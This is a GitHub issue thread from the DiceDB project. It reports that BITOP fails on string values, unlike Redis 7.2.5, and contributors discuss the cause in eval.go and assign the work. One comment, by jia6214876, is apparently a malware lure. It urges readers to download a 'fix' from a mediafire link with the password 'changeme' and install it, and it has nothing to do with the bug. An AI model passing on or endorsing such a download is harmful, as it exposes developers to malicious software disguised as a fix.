### ISSUE TITLE
Inconsistent `BITOP`: BITOP throws error for strings

### ISSUE THREAD

**Issue by apoorvyadav1111** [DiceDB/dice#412]
The command `BITOP` is not consistent with Redis implementation. Here are the steps to reproduce the issue

```
SET key1 "foobar"
SET key2 "abcdef"
```

Here's the output I observed in Redis v7.2.5

```
redis> BITOP AND dest key1 key2
(integer) 6
```

and here's the output I observed in DiceDB's latest commit of the `master` branch

```
127.0.0.1:7379> BITOP AND dest key1 key2
(error) ERR value is not a valid byte array
```

Make the implementation consistent with the Redis implementation.
Make sure you are using Redis version 7.2.5 as a reference for the
command implementation and to setup Redis

- [from source code](https://gist.github.com/arpitbbhayani/94aedf279349303ed7394197976b6843), or
- [use Docker](https://hub.docker.com/_/redis).

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kushal0511-not** [comment]
@apoorvyadav1111
We are not handling case for string and integer here, we are only checking for ByteArray type and encoding.
https://github.com/DiceDB/dice/blob/7d9c309289c41492a66140e47efce85b9f549597/core/eval.go#L1789

This is same issue as we have in SETBIT.
I have raised PR for SETBBIT  https://github.com/DiceDB/dice/pull/409 .
We can do similar with BITOP.

**Comment by apoorvyadav1111** [comment]
@kushal0511-not , yea,I stumbled upon this while working on adding validations for all the commands in case they access a SET data structure.  I was wanted to add an issue for it to be officially tracked. 

Would you be working on this? I can work on this if #413 is accepted or if someone would like to take this one up.

**Comment by kushal0511-not** [comment]
@apoorvyadav1111 Feel free to take this if #413 is accepted.

**Comment by apoorvyadav1111** [comment]
Hi @JyotinderSingh, Please assign this to me.

Thanks,
Apoorv

**Comment by JyotinderSingh** [comment]
> Hi @JyotinderSingh, Please assign this to me.
> 
> 
> 
> Thanks,
> 
> Apoorv

Thanks for picking this up Apoorv, assigned.
